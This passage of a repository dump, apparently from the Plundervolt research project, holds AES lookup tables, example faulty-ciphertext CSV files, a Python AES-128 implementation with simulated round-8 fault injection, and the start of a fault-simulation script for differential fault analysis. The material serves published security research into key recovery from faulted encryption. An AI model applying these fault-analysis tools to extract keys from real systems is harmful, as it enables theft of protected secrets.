144 |   0xda, 0xd7, 0xc0, 0xcd, 0xee, 0xe3, 0xf4, 0xf9, 0xb2, 0xbf, 0xa8, 0xa5, 0x86, 0x8b, 0x9c, 0x91,
145 |   0x0a, 0x07, 0x10, 0x1d, 0x3e, 0x33, 0x24, 0x29, 0x62, 0x6f, 0x78, 0x75, 0x56, 0x5b, 0x4c, 0x41,
146 |   0x61, 0x6c, 0x7b, 0x76, 0x55, 0x58, 0x4f, 0x42, 0x09, 0x04, 0x13, 0x1e, 0x3d, 0x30, 0x27, 0x2a,
147 |   0xb1, 0xbc, 0xab, 0xa6, 0x85, 0x88, 0x9f, 0x92, 0xd9, 0xd4, 0xc3, 0xce, 0xed, 0xe0, 0xf7, 0xfa,
148 |   0xb7, 0xba, 0xad, 0xa0, 0x83, 0x8e, 0x99, 0x94, 0xdf, 0xd2, 0xc5, 0xc8, 0xeb, 0xe6, 0xf1, 0xfc,
149 |   0x67, 0x6a, 0x7d, 0x70, 0x53, 0x5e, 0x49, 0x44, 0x0f, 0x02, 0x15, 0x18, 0x3b, 0x36, 0x21, 0x2c,
150 |   0x0c, 0x01, 0x16, 0x1b, 0x38, 0x35, 0x22, 0x2f, 0x64, 0x69, 0x7e, 0x73, 0x50, 0x5d, 0x4a, 0x47,
151 |   0xdc, 0xd1, 0xc6, 0xcb, 0xe8, 0xe5, 0xf2, 0xff, 0xb4, 0xb9, 0xae, 0xa3, 0x80, 0x8d, 0x9a, 0x97
152 | };
153 | 
154 | const uint8_t gm_0e[256] =
155 | {
156 |   0x00, 0x0e, 0x1c, 0x12, 0x38, 0x36, 0x24, 0x2a, 0x70, 0x7e, 0x6c, 0x62, 0x48, 0x46, 0x54, 0x5a,
157 |   0xe0, 0xee, 0xfc, 0xf2, 0xd8, 0xd6, 0xc4, 0xca, 0x90, 0x9e, 0x8c, 0x82, 0xa8, 0xa6, 0xb4, 0xba,
158 |   0xdb, 0xd5, 0xc7, 0xc9, 0xe3, 0xed, 0xff, 0xf1, 0xab, 0xa5, 0xb7, 0xb9, 0x93, 0x9d, 0x8f, 0x81,
159 |   0x3b, 0x35, 0x27, 0x29, 0x03, 0x0d, 0x1f, 0x11, 0x4b, 0x45, 0x57, 0x59, 0x73, 0x7d, 0x6f, 0x61,
160 |   0xad, 0xa3, 0xb1, 0xbf, 0x95, 0x9b, 0x89, 0x87, 0xdd, 0xd3, 0xc1, 0xcf, 0xe5, 0xeb, 0xf9, 0xf7,
161 |   0x4d, 0x43, 0x51, 0x5f, 0x75, 0x7b, 0x69, 0x67, 0x3d, 0x33, 0x21, 0x2f, 0x05, 0x0b, 0x19, 0x17,
162 |   0x76, 0x78, 0x6a, 0x64, 0x4e, 0x40, 0x52, 0x5c, 0x06, 0x08, 0x1a, 0x14, 0x3e, 0x30, 0x22, 0x2c,
163 |   0x96, 0x98, 0x8a, 0x84, 0xae, 0xa0, 0xb2, 0xbc, 0xe6, 0xe8, 0xfa, 0xf4, 0xde, 0xd0, 0xc2, 0xcc,
164 |   0x41, 0x4f, 0x5d, 0x53, 0x79, 0x77, 0x65, 0x6b, 0x31, 0x3f, 0x2d, 0x23, 0x09, 0x07, 0x15, 0x1b,
165 |   0xa1, 0xaf, 0xbd, 0xb3, 0x99, 0x97, 0x85, 0x8b, 0xd1, 0xdf, 0xcd, 0xc3, 0xe9, 0xe7, 0xf5, 0xfb,
166 |   0x9a, 0x94, 0x86, 0x88, 0xa2, 0xac, 0xbe, 0xb0, 0xea, 0xe4, 0xf6, 0xf8, 0xd2, 0xdc, 0xce, 0xc0,
167 |   0x7a, 0x74, 0x66, 0x68, 0x42, 0x4c, 0x5e, 0x50, 0x0a, 0x04, 0x16, 0x18, 0x32, 0x3c, 0x2e, 0x20,
168 |   0xec, 0xe2, 0xf0, 0xfe, 0xd4, 0xda, 0xc8, 0xc6, 0x9c, 0x92, 0x80, 0x8e, 0xa4, 0xaa, 0xb8, 0xb6,
169 |   0x0c, 0x02, 0x10, 0x1e, 0x34, 0x3a, 0x28, 0x26, 0x7c, 0x72, 0x60, 0x6e, 0x44, 0x4a, 0x58, 0x56,
170 |   0x37, 0x39, 0x2b, 0x25, 0x0f, 0x01, 0x13, 0x1d, 0x47, 0x49, 0x5b, 0x55, 0x7f, 0x71, 0x63, 0x6d,
171 |   0xd7, 0xd9, 0xcb, 0xc5, 0xef, 0xe1, 0xf3, 0xfd, 0xa7, 0xa9, 0xbb, 0xb5, 0x9f, 0x91, 0x83, 0x8d
172 | };
173 | 
174 | const uint8_t gm_8d[256] =
175 | {
176 |   0x00, 0x8d, 0x01, 0x8c, 0x02, 0x8f, 0x03, 0x8e, 0x04, 0x89, 0x05, 0x88, 0x06, 0x8b, 0x07, 0x8a,
177 |   0x08, 0x85, 0x09, 0x84, 0x0a, 0x87, 0x0b, 0x86, 0x0c, 0x81, 0x0d, 0x80, 0x0e, 0x83, 0x0f, 0x82,
178 |   0x10, 0x9d, 0x11, 0x9c, 0x12, 0x9f, 0x13, 0x9e, 0x14, 0x99, 0x15, 0x98, 0x16, 0x9b, 0x17, 0x9a,
179 |   0x18, 0x95, 0x19, 0x94, 0x1a, 0x97, 0x1b, 0x96, 0x1c, 0x91, 0x1d, 0x90, 0x1e, 0x93, 0x1f, 0x92,
180 |   0x20, 0xad, 0x21, 0xac, 0x22, 0xaf, 0x23, 0xae, 0x24, 0xa9, 0x25, 0xa8, 0x26, 0xab, 0x27, 0xaa,
181 |   0x28, 0xa5, 0x29, 0xa4, 0x2a, 0xa7, 0x2b, 0xa6, 0x2c, 0xa1, 0x2d, 0xa0, 0x2e, 0xa3, 0x2f, 0xa2,
182 |   0x30, 0xbd, 0x31, 0xbc, 0x32, 0xbf, 0x33, 0xbe, 0x34, 0xb9, 0x35, 0xb8, 0x36, 0xbb, 0x37, 0xba,
183 |   0x38, 0xb5, 0x39, 0xb4, 0x3a, 0xb7, 0x3b, 0xb6, 0x3c, 0xb1, 0x3d, 0xb0, 0x3e, 0xb3, 0x3f, 0xb2,
184 |   0x40, 0xcd, 0x41, 0xcc, 0x42, 0xcf, 0x43, 0xce, 0x44, 0xc9, 0x45, 0xc8, 0x46, 0xcb, 0x47, 0xca,
185 |   0x48, 0xc5, 0x49, 0xc4, 0x4a, 0xc7, 0x4b, 0xc6, 0x4c, 0xc1, 0x4d, 0xc0, 0x4e, 0xc3, 0x4f, 0xc2,
186 |   0x50, 0xdd, 0x51, 0xdc, 0x52, 0xdf, 0x53, 0xde, 0x54, 0xd9, 0x55, 0xd8, 0x56, 0xdb, 0x57, 0xda,
187 |   0x58, 0xd5, 0x59, 0xd4, 0x5a, 0xd7, 0x5b, 0xd6, 0x5c, 0xd1, 0x5d, 0xd0, 0x5e, 0xd3, 0x5f, 0xd2,
188 |   0x60, 0xed, 0x61, 0xec, 0x62, 0xef, 0x63, 0xee, 0x64, 0xe9, 0x65, 0xe8, 0x66, 0xeb, 0x67, 0xea,
189 |   0x68, 0xe5, 0x69, 0xe4, 0x6a, 0xe7, 0x6b, 0xe6, 0x6c, 0xe1, 0x6d, 0xe0, 0x6e, 0xe3, 0x6f, 0xe2,
190 |   0x70, 0xfd, 0x71, 0xfc, 0x72, 0xff, 0x73, 0xfe, 0x74, 0xf9, 0x75, 0xf8, 0x76, 0xfb, 0x77, 0xfa,
191 |   0x78, 0xf5, 0x79, 0xf4, 0x7a, 0xf7, 0x7b, 0xf6, 0x7c, 0xf1, 0x7d, 0xf0, 0x7e, 0xf3, 0x7f, 0xf2
192 | };
193 | 
194 | const uint8_t gm_f6[256] =
195 | {
196 |   0x00, 0xf6, 0xf7, 0x01, 0xf5, 0x03, 0x02, 0xf4, 0xf1, 0x07, 0x06, 0xf0, 0x04, 0xf2, 0xf3, 0x05,
197 |   0xf9, 0x0f, 0x0e, 0xf8, 0x0c, 0xfa, 0xfb, 0x0d, 0x08, 0xfe, 0xff, 0x09, 0xfd, 0x0b, 0x0a, 0xfc,
198 |   0xe9, 0x1f, 0x1e, 0xe8, 0x1c, 0xea, 0xeb, 0x1d, 0x18, 0xee, 0xef, 0x19, 0xed, 0x1b, 0x1a, 0xec,
199 |   0x10, 0xe6, 0xe7, 0x11, 0xe5, 0x13, 0x12, 0xe4, 0xe1, 0x17, 0x16, 0xe0, 0x14, 0xe2, 0xe3, 0x15,
200 |   0xc9, 0x3f, 0x3e, 0xc8, 0x3c, 0xca, 0xcb, 0x3d, 0x38, 0xce, 0xcf, 0x39, 0xcd, 0x3b, 0x3a, 0xcc,
201 |   0x30, 0xc6, 0xc7, 0x31, 0xc5, 0x33, 0x32, 0xc4, 0xc1, 0x37, 0x36, 0xc0, 0x34, 0xc2, 0xc3, 0x35,
202 |   0x20, 0xd6, 0xd7, 0x21, 0xd5, 0x23, 0x22, 0xd4, 0xd1, 0x27, 0x26, 0xd0, 0x24, 0xd2, 0xd3, 0x25,
203 |   0xd9, 0x2f, 0x2e, 0xd8, 0x2c, 0xda, 0xdb, 0x2d, 0x28, 0xde, 0xdf, 0x29, 0xdd, 0x2b, 0x2a, 0xdc,
204 |   0x89, 0x7f, 0x7e, 0x88, 0x7c, 0x8a, 0x8b, 0x7d, 0x78, 0x8e, 0x8f, 0x79, 0x8d, 0x7b, 0x7a, 0x8c,
205 |   0x70, 0x86, 0x87, 0x71, 0x85, 0x73, 0x72, 0x84, 0x81, 0x77, 0x76, 0x80, 0x74, 0x82, 0x83, 0x75,
206 |   0x60, 0x96, 0x97, 0x61, 0x95, 0x63, 0x62, 0x94, 0x91, 0x67, 0x66, 0x90, 0x64, 0x92, 0x93, 0x65,
207 |   0x99, 0x6f, 0x6e, 0x98, 0x6c, 0x9a, 0x9b, 0x6d, 0x68, 0x9e, 0x9f, 0x69, 0x9d, 0x6b, 0x6a, 0x9c,
208 |   0x40, 0xb6, 0xb7, 0x41, 0xb5, 0x43, 0x42, 0xb4, 0xb1, 0x47, 0x46, 0xb0, 0x44, 0xb2, 0xb3, 0x45,
209 |   0xb9, 0x4f, 0x4e, 0xb8, 0x4c, 0xba, 0xbb, 0x4d, 0x48, 0xbe, 0xbf, 0x49, 0xbd, 0x4b, 0x4a, 0xbc,
210 |   0xa9, 0x5f, 0x5e, 0xa8, 0x5c, 0xaa, 0xab, 0x5d, 0x58, 0xae, 0xaf, 0x59, 0xad, 0x5b, 0x5a, 0xac,
211 |   0x50, 0xa6, 0xa7, 0x51, 0xa5, 0x53, 0x52, 0xa4, 0xa1, 0x57, 0x56, 0xa0, 0x54, 0xa2, 0xa3, 0x55
212 | };
213 | 
214 | #endif
215 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/examples/dfa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KitMurdock/plundervolt/a7313c268d7c27ac3eb806d3ed99019788c5f605/sgx_aes_ni/dfa-aes-master/examples/dfa


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/examples/input-1.csv:
--------------------------------------------------------------------------------
1 | c682acc5fb98a14659592262a4b9826e 55ad101842a73bf57af7a69bb0fae519
2 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/examples/input-2.csv:
--------------------------------------------------------------------------------
1 | bd15cd8570395ea38775c48b6a4b00b6 ae999b8ae4bb554122cc0db18f93a06f
2 | 153bcb68499e98be77b8f44bf047a518 64e984b73e77e4dd2e4571197b62f3ad
3 | c682acc5fb98a14659592262a4b9826e 76e915399248ad40f325c0194a04ce43
4 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/examples/keys-0.csv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KitMurdock/plundervolt/a7313c268d7c27ac3eb806d3ed99019788c5f605/sgx_aes_ni/dfa-aes-master/examples/keys-0.csv


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/examples/kit.csv:
--------------------------------------------------------------------------------
1 | b2cca7abd5572942889350f10dd2946 b2cca7abd5572942889350f10dd2d46
2 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/simulator/aes.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #
  3 | # Licensed by "The MIT License". See file LICENSE.
  4 | #
  5 | # Implementation of AES-128 with the option to simulate fault
  6 | # injections in round 8.
  7 | # expk are already expanded keys reconstructed from the fault analysis.
  8 | #
  9 | def encrypt(p,k=None,expk=None,fault=0x00,floc=0):
 10 |   plaintext = to_matrix(p)
 11 |   if expk == None:
 12 |     expanded_key = expandkey(k)
 13 |   else:
 14 |     expanded_key = expk
 15 |   state = add_roundkey(plaintext, get_roundkey(expanded_key,0))
 16 |   for r in range(1,10):
 17 |     if (r == 8):
 18 |       state[ floc % 4 ][ floc / 4 ] ^= fault # fault injection
 19 |     #print "{:x}-in {:032x}".format(r, to_bitstring(state))
 20 |     state = subbytes(state)
 21 |     #print "{:x}-sr {:032x}".format(r, to_bitstring(state))
 22 |     state = shiftrows(state)
 23 |     #if (r == 8):
 24 | 	#    print "{:x}-mc {:032x}".format(r, to_bitstring(state))
 25 |     state = mixcolumns(state)
 26 |     #print "{:x}-rk {:032x}".format(r, to_bitstring(state))
 27 |     state = add_roundkey(state, get_roundkey(expanded_key,r))
 28 |   # final round
 29 |   #print "{:x} {:032x}".format(10, to_bitstring(state))
 30 |   return to_bitstring( add_roundkey(shiftrows( subbytes(state)), get_roundkey(expanded_key,10)))
 31 | 
 32 | def decrypt(c,k):
 33 |   ciphertext = to_matrix(c)
 34 |   expanded_key = expandkey(k)
 35 |   state = inv_subbytes(invShiftRows( add_roundkey(ciphertext, get_roundkey(expanded_key,10))))
 36 |   for r in range(9,0,-1):
 37 |     roundKey = get_roundkey(expanded_key,r)
 38 |     state = inv_subbytes(invShiftRows(inv_mixcolumns( add_roundkey(state,roundKey))))
 39 |   return to_bitstring(add_roundkey(state, get_roundkey(expanded_key,0)))
 40 | 
 41 | def add_roundkey(state,roundKey):
 42 |   for i in range(0,4):
 43 |     for j in range(0,4):
 44 |       state[i][j] ^= roundKey[i][j]
 45 |   return state
 46 | 
 47 | def get_roundkey(expanded_key,r):
 48 |   key = 0
 49 |   for i in xrange(4):
 50 |     key ^= expanded_key[4*r+i] << 96-32*i
 51 |   return to_matrix(key)
 52 | 
 53 | def ks_core(t,r):
 54 |   b = ((t << 8) & 0xffffffff) ^ (t >> 24)
 55 |   c = rcon[r] << 24
 56 |   for i in xrange(4):
 57 |     c ^= sbox[(b >> 24 - 8*i) & 0xff] << 24 - 8*i
 58 |   return c
 59 | 
 60 | def expandkey(key):
 61 |   Nb = 4
 62 |   Nk = 4
 63 |   Nr = 10
 64 |   rconi = 1
 65 |   expanded_key = [(key >> 96-32*i) & 0xffffffff for i in xrange(4)]
 66 |   for i in xrange(Nk,Nb * (Nr + 1)):
 67 |     t = expanded_key[i-1]
 68 |     if (i % Nk == 0):
 69 |       t = ks_core(t,rconi)
 70 |       rconi += 1
 71 |     expanded_key.append(expanded_key[i-Nk] ^ t)
 72 |     i += 1
 73 |   return expanded_key
 74 | 
 75 | def subbytes(state):
 76 |   return apply_subbytes(state,False)
 77 | 
 78 | def inv_subbytes(state):
 79 |   return apply_subbytes(state,True)
 80 | 
 81 | def apply_subbytes(state,isInv):
 82 |   for i in range(0,4):
 83 |     for j in range(0,4):
 84 |       if (not isInv):
 85 |         state[i][j] = sbox[state[i][j]]
 86 |       else:
 87 |         state[i][j] = inv_sbox[state[i][j]]
 88 |   return state
 89 | 
 90 | def shiftrows(state):
 91 |   return apply_shiftrows(state,False)
 92 | 
 93 | def inv_shiftrows(state):
 94 |   return apply_shiftrows(state,True)
 95 | 
 96 | def apply_shiftrows(state,isInv):
 97 |   for i in range(1,4):
 98 |     for j in range(1,i+1):
 99 |       if(not isInv):
100 |         state[i].append(state[i].pop(0)) # left-shift
101 |       else:
102 |         state[i].insert(0,state[i].pop()) # right-shift
103 |   return state
104 | 
105 | def mixcolumns(state):
106 |   return apply_mixcolumns(state,False)
107 | 
108 | def inv_mixcolumns(state):
109 |   return apply_mixcolumns(state,True)
110 | 
111 | def apply_mixcolumns(state,isInv):
112 |   s = [
113 |     [0x00,0x00,0x00,0x00],
114 |     [0x00,0x00,0x00,0x00],
115 |     [0x00,0x00,0x00,0x00],
116 |     [0x00,0x00,0x00,0x00],
117 |   ]
118 |   if (not isInv):
119 |     # matrix for mixcolumns
120 |     m = [
121 |       [0x02,0x03,0x01,0x01],
122 |       [0x01,0x02,0x03,0x01],
123 |       [0x01,0x01,0x02,0x03],
124 |       [0x03,0x01,0x01,0x02]
125 |     ]
126 |   else:
127 |     # matrx for invMixColumns
128 |     m = [
129 |       [0x0e,0x0b,0x0d,0x09],
130 |       [0x09,0x0e,0x0b,0x0d],
131 |       [0x0d,0x09,0x0e,0x0b],
132 |       [0x0b,0x0d,0x09,0x0e]
133 |     ]
134 |   for i in range(0,4):
135 |     for j in range(0,4):
136 |       for k in range(0,4):
137 |         s[i][j] ^= gm(state[k][j],m[i][k])
138 |   return s
139 | 
140 | # galois multiplication
141 | def gm(a,b):
142 |   f = 0x11b  # AES polynomial: x^8 + x^4 + x^3 + x + 1
143 |   g = 0
144 |   for i in range(8):
145 |     if (b & 1) == 1: g ^= a
146 |     hbs = (a & 0x80) # check if highest bit is set
147 |     a <<= 1
148 |     if hbs == 0x80: a ^= f
149 |     b >>= 1
150 |   return g
151 | 
152 | #Rijndael S-box
153 | sbox = [
154 | 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
155 | 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
156 | 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
157 | 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
158 | 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
159 | 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
160 | 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
161 | 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
162 | 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
163 | 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
164 | 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
165 | 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
166 | 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
167 | 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
168 | 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
169 | 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 ]
170 | 
171 | # Rijndael Inverted S-box
172 | inv_sbox = [
173 | 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb,
174 | 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb,
175 | 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e,
176 | 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25,
177 | 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92,
178 | 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84,
179 | 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06,
180 | 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b,
181 | 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73,
182 | 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e,
183 | 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b,
184 | 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4,
185 | 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f,
186 | 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef,
187 | 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61,
188 | 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d ]
189 | 
190 | # Rijndael Rcon
191 | rcon = [
192 | 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
193 | 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
194 | 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
195 | 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
196 | 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
197 | 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
198 | 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
199 | 0x36, 0x6c, 0xd8, 0xab, 0x4D, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
200 | 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
201 | 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
202 | 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
203 | 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
204 | 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
205 | 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
206 | 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
207 | 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb ]
208 | 
209 | def to_matrix(s):
210 |   m = []
211 |   for i in xrange(4):
212 |     m.append([(s >> (120-8*(4*j+i))) & 0xff for j in xrange(4)])
213 |   return m
214 | 
215 | def to_bitstring(s):
216 |   m = 0
217 |   for i in xrange(len(s)):
218 |     for j in xrange(len(s[i])):
219 |       m ^= s[i][j] << (120-8*(4*j+i))
220 |   return m
221 | 
222 | def printmatrix(m):
223 |   for i in xrange(4):
224 |     for j in xrange(4):
225 |       print "{:02x} ".format(m[i][j]),
226 |     print ""
227 |   print ""
228 | 
229 | def printkeys(keys):
230 |   for i in xrange(len(keys)):
231 |     print "{:08x}".format(keys[i])
232 |   print ""
233 | 
234 | def test_aes():
235 | 
236 |  # KEY, PLAINTEXT, CIPHERTEXT
237 |   L = [(0x00000000000000000000000000000000,0x80000000000000000000000000000000,0x3ad78e726c1ec02b7ebfe92b23d9ec34),
238 |        (0x00000000000000000000000000000000,0xc0000000000000000000000000000000,0xaae5939c8efdf2f04e60b9fe7117b2c2),
239 |        (0x00000000000000000000000000000000,0xe0000000000000000000000000000000,0xf031d4d74f5dcbf39daaf8ca3af6e527),
240 |        (0x00000000000000000000000000000000,0xf0000000000000000000000000000000,0x96d9fd5cc4f07441727df0f33e401a36),
241 |        (0x00000000000000000000000000000000,0xf8000000000000000000000000000000,0x30ccdb044646d7e1f3ccea3dca08b8c0),
242 |        (0x00000000000000000000000000000000,0xff800000000000000000000000000000,0xa81738252621dd180a34f3455b4baa2f),
243 |        (0x00000000000000000000000000000000,0xffffffffffffffffffffe00000000000,0x9ca547f7439edc3e255c0f4d49aa8990),
244 |        (0x2b7e151628aed2a6abf7158809cf4f3c,0x6bc1bee22e409f96e93d7e117393172a,0x3ad77bb40d7a3660a89ecaf32466ef97),
245 |        (0x2b7e151628aed2a6abf7158809cf4f3c,0xae2d8a571e03ac9c9eb76fac45af8e51,0xf5d3d58503b9699de785895a96fdbaaf),
246 |        (0x2b7e151628aed2a6abf7158809cf4f3c,0x30c81c46a35ce411e5fbc1191a0a52ef,0x43b1cd7f598ece23881b00e3ed030688),
247 |        (0x2b7e151628aed2a6abf7158809cf4f3c,0xf69f2445df4f9b17ad2b417be66c3710,0x7b0c785e27e8ad3f8223207104725dd4)]
248 | 
249 |   for e in L:
250 |     assert e[2] == encrypt(e[1],e[0])
251 | 
252 |   print "All tests passed."
253 | 
254 | if __name__ == '__main__':
255 |   test_aes()
256 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/simulator/inject.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #
 3 | # Licensed by "The MIT License". See file LICENSE.
 4 | #
 5 | # Script to simulate fault injections on AES-128.
 6 | # Prints correct and corresponding faulty ciphertext.
 7 | #
 8 | # Usage: ./inject nr_of_example fault_location
 9 | #
10 | # fault_location must be in {0,...,15}.
11 | #
12 | import sys
13 | from aes import *
14 | 
15 | # (plaintext,key,fault_value)
16 | vectors = [
17 |    (0x00000000000000000000000000000000,0x00000000000000000000000000000000,0x01), # 0
18 |    (0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xff), # 1
19 |    (0x1234567890abcdef1234567890abcdef,0x1234567890abcdef1234567890abcdef,0x02), # 2
20 |    (0xfedcba0987654321fedcba0987654321,0xfedcba0987654321fedcba0987654321,0x02), # 3
